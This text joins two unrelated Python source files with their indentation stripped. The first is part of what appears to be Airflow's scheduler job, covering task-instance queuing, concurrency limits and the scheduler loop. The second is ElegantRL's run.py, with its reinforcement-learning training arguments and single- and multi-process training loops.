processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as being in the running state with a heartbeat received within
the threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: a map from dag_id to # of task instances in the given state list and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
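# The loop below aggregates counts per DAG and per (DAG, task), e.g. with
# illustrative values: dag_map == {'example_dag': 3} and
# task_map == {('example_dag', 'task_a'): 2, ('example_dag', 'task_b'): 1}.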
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
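# i.e. highest priority_weight first; ties broken by earliest execution_date.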
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the TI is not running
# (e.g. a TI queued for its first attempt reports try_number == 1 but is
# stored with _try_number == 0), so subtract 1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs back to the scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
run.py
|
import os
import gym
import time
import torch
import numpy as np
import numpy.random as rd
from copy import deepcopy
from elegantrl.replay import ReplayBuffer, ReplayBufferMP
from elegantrl.env import PreprocessEnv
"""[ElegantRL](https://github.com/AI4Finance-LLC/ElegantRL)"""
class Arguments:
def __init__(self, agent=None, env=None, gpu_id=None, if_on_policy=False):
self.agent = agent # Deep Reinforcement Learning algorithm
self.cwd = None  # current working directory; None means it will be set automatically
self.env = env # the environment for training
self.env_eval = None # the environment for evaluating
self.gpu_id = gpu_id  # which GPU to run on; None means it will be chosen automatically
'''Arguments for training (off-policy)'''
self.net_dim = 2 ** 8 # the network width
self.batch_size = 2 ** 8 # num of transitions sampled from replay buffer.
self.repeat_times = 2 ** 0 # repeatedly update network to keep critic's loss small
self.target_step = 2 ** 10 # collect target_step, then update network
self.max_memo = 2 ** 17 # capacity of replay buffer
if if_on_policy: # (on-policy)
self.net_dim = 2 ** 9
self.batch_size = 2 ** 9
self.repeat_times = 2 ** 4
self.target_step = 2 ** 12
self.max_memo = self.target_step
self.gamma = 0.99 # discount factor of future rewards
self.reward_scale = 2 ** 0  # reward scaling factor; choose it so the scaled target reward is close to 256
self.if_per = False # Prioritized Experience Replay for sparse reward
self.rollout_num = 2 # the number of rollout workers (larger is not always faster)
self.num_threads = 8 # cpu_num for evaluate model, torch.set_num_threads(self.num_threads)
'''Arguments for evaluate'''
self.break_step = 2 ** 20 # break training after 'total_step > break_step'
self.if_remove = True # remove the cwd folder? (True, False, None:ask me)
self.if_allow_break = True # allow break training when reach goal (early termination)
self.eval_gap = 2 ** 5 # evaluate the agent per eval_gap seconds
self.eval_times1 = 2 ** 2 # evaluation times
self.eval_times2 = 2 ** 4 # evaluation times if 'eval_reward > max_reward'
self.random_seed = 0 # initialize random seed in self.init_before_training()
def init_before_training(self, if_main=True):
if self.agent is None:
raise RuntimeError('\n| agent is None. Please assign args.agent = AgentXXX().')
if not hasattr(self.agent, 'init'):
raise RuntimeError('\n| There should be agent=AgentXXX() instead of agent=AgentXXX')
if self.env is None:
raise RuntimeError('\n| env is None. Please assign args.env = XxxEnv().')
if isinstance(self.env, str) or not hasattr(self.env, 'env_name'):
raise RuntimeError('\n| env has no env_name. Wrap it first: env = PreprocessEnv(env).')
'''set gpu_id automatically'''
if self.gpu_id is None: # set gpu_id automatically
import sys
self.gpu_id = sys.argv[-1][-4]
else:
self.gpu_id = str(self.gpu_id)
if not self.gpu_id.isdigit(): # set gpu_id as '0' in default
self.gpu_id = '0'
'''set cwd automatically'''
if self.cwd is None:
agent_name = self.agent.__class__.__name__
self.cwd = f'./{agent_name}/{self.env.env_name}_{self.gpu_id}'
if if_main:
print(f'| GPU id: {self.gpu_id}, cwd: {self.cwd}')
import shutil # remove history according to bool(if_remove)
if self.if_remove is None:
self.if_remove = bool(input("PRESS 'y' to REMOVE: {}? ".format(self.cwd)) == 'y')
if self.if_remove:
shutil.rmtree(self.cwd, ignore_errors=True)
print("| Remove history")
os.makedirs(self.cwd, exist_ok=True)
os.environ['CUDA_VISIBLE_DEVICES'] = str(self.gpu_id)
torch.set_num_threads(self.num_threads)
torch.set_default_dtype(torch.float32)
torch.manual_seed(self.random_seed)
np.random.seed(self.random_seed)
'''single process training'''
def train_and_evaluate(args):
args.init_before_training()
'''basic arguments'''
cwd = args.cwd
env = args.env
agent = args.agent
gpu_id = args.gpu_id # necessary for Evaluator?
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_break_early = args.if_allow_break
if_per = args.if_per
gamma = args.gamma
reward_scale = args.reward_scale
'''evaluating arguments'''
eval_gap = args.eval_gap
eval_times1 = args.eval_times1
eval_times2 = args.eval_times2
if args.env_eval is not None:
env_eval = args.env_eval
elif env.env_name in set(gym.envs.registry.env_specs.keys()):
env_eval = PreprocessEnv(gym.make(env.env_name))
else:
env_eval = deepcopy(env)
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer, Evaluator'''
agent.init(net_dim, state_dim, action_dim, if_per)
if_on_policy = getattr(agent, 'if_on_policy', False)
buffer = ReplayBuffer(max_len=max_memo + max_step, state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
if_on_policy=if_on_policy, if_per=if_per, if_gpu=True)
evaluator = Evaluator(cwd=cwd, agent_id=gpu_id, device=agent.device, env=env_eval,
eval_gap=eval_gap, eval_times1=eval_times1, eval_times2=eval_times2, )
'''prepare for training'''
agent.state = env.reset()
if if_on_policy:
steps = 0
else: # explore_before_training for off-policy
with torch.no_grad(): # update replay buffer
steps = explore_before_training(env, buffer, target_step, reward_scale, gamma)
agent.update_net(buffer, target_step, batch_size, repeat_times) # pre-training and hard update
agent.act_target.load_state_dict(agent.act.state_dict()) if getattr(agent, 'act_target', None) else None
agent.cri_target.load_state_dict(agent.cri.state_dict()) if getattr(agent, 'cri_target', None) else None
total_step = steps
'''start training'''
if_reach_goal = False
while not ((if_break_early and if_reach_goal)
or total_step > break_step
or os.path.exists(f'{cwd}/stop')):
steps = agent.explore_env(env, buffer, target_step, reward_scale, gamma)
total_step += steps
obj_a, obj_c = agent.update_net(buffer, target_step, batch_size, repeat_times)
if_reach_goal = evaluator.evaluate_save(agent.act, steps, obj_a, obj_c)
evaluator.draw_plot()
print(f'| SavedDir: {cwd}\n| UsedTime: {time.time() - evaluator.start_time:.0f}')
'''multiprocessing training'''
def train_and_evaluate_mp(args):
act_workers = args.rollout_num
import multiprocessing as mp # Python built-in multiprocessing library
pipe1_eva, pipe2_eva = mp.Pipe() # Pipe() for Process mp_evaluate_agent()
pipe2_exp_list = list() # Pipe() for Process mp_explore_in_env()
process_train = mp.Process(target=mp_train, args=(args, pipe2_eva, pipe2_exp_list))
process_evaluate = mp.Process(target=mp_evaluate, args=(args, pipe1_eva))
process = [process_train, process_evaluate]
for worker_id in range(act_workers):
exp_pipe1, exp_pipe2 = mp.Pipe(duplex=True)
pipe2_exp_list.append(exp_pipe1)
process.append(mp.Process(target=mp_explore, args=(args, exp_pipe2, worker_id)))
[p.start() for p in process]
process_evaluate.join()
process_train.join()
[p.terminate() for p in process]
def mp_train(args, pipe1_eva, pipe1_exp_list):
args.init_before_training(if_main=False)
'''basic arguments'''
env = args.env
cwd = args.cwd
agent = args.agent
rollout_num = args.rollout_num
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_break_early = args.if_allow_break
if_per = args.if_per
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer'''
agent.init(net_dim, state_dim, action_dim, if_per)
if_on_policy = getattr(agent, 'if_on_policy', False)
'''send'''
pipe1_eva.send(agent.act) # send
# act = pipe2_eva.recv() # recv
buffer_mp = ReplayBufferMP(max_len=max_memo + max_step * rollout_num, if_on_policy=if_on_policy,
state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
rollout_num=rollout_num, if_gpu=True, if_per=if_per)
'''prepare for training'''
if if_on_policy:
steps = 0
else: # explore_before_training for off-policy
with torch.no_grad(): # update replay buffer
steps = 0
for i in range(rollout_num):
pipe1_exp = pipe1_exp_list[i]
# pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
buf_state, buf_other = pipe1_exp.recv()
steps += len(buf_state)
buffer_mp.extend_buffer(buf_state, buf_other, i)
agent.update_net(buffer_mp, target_step, batch_size, repeat_times) # pre-training and hard update
agent.act_target.load_state_dict(agent.act.state_dict()) if getattr(agent, 'act_target', None) else None
agent.cri_target.load_state_dict(agent.cri.state_dict()) if getattr(agent, 'cri_target', None) else None
total_step = steps
'''send'''
pipe1_eva.send((agent.act, steps, 0, 0.5)) # send
# act, steps, obj_a, obj_c = pipe2_eva.recv() # recv
'''start training'''
if_solve = False
while not ((if_break_early and if_solve)
or total_step > break_step
or os.path.exists(f'{cwd}/stop')):
'''update ReplayBuffer'''
steps = 0 # send by pipe1_eva
for i in range(rollout_num):
pipe1_exp = pipe1_exp_list[i]
'''send'''
pipe1_exp.send(agent.act)
# agent.act = pipe2_exp.recv()
'''recv'''
# pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
buf_state, buf_other = pipe1_exp.recv()
steps += len(buf_state)
buffer_mp.extend_buffer(buf_state, buf_other, i)
total_step += steps
'''update network parameters'''
obj_a, obj_c = agent.update_net(buffer_mp, target_step, batch_size, repeat_times)
'''saves the agent with max reward'''
'''send'''
pipe1_eva.send((agent.act, steps, obj_a, obj_c))
# q_i_eva_get = pipe2_eva.recv()
if_solve = pipe1_eva.recv()
if pipe1_eva.poll():
'''recv'''
# pipe2_eva.send(if_solve)
if_solve = pipe1_eva.recv()
buffer_mp.print_state_norm(env.neg_state_avg if hasattr(env, 'neg_state_avg') else None,
env.div_state_std if hasattr(env, 'div_state_std') else None) # 2020-12-12
'''send'''
pipe1_eva.send('stop')
# q_i_eva_get = pipe2_eva.recv()
time.sleep(4)
def mp_explore(args, pipe2_exp, worker_id):
args.init_before_training(if_main=False)
'''basic arguments'''
env = args.env
agent = args.agent
rollout_num = args.rollout_num
'''training arguments'''
net_dim = args.net_dim
max_memo = args.max_memo
target_step = args.target_step
gamma = args.gamma
if_per = args.if_per
reward_scale = args.reward_scale
random_seed = args.random_seed
torch.manual_seed(random_seed + worker_id)
np.random.seed(random_seed + worker_id)
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: environment'''
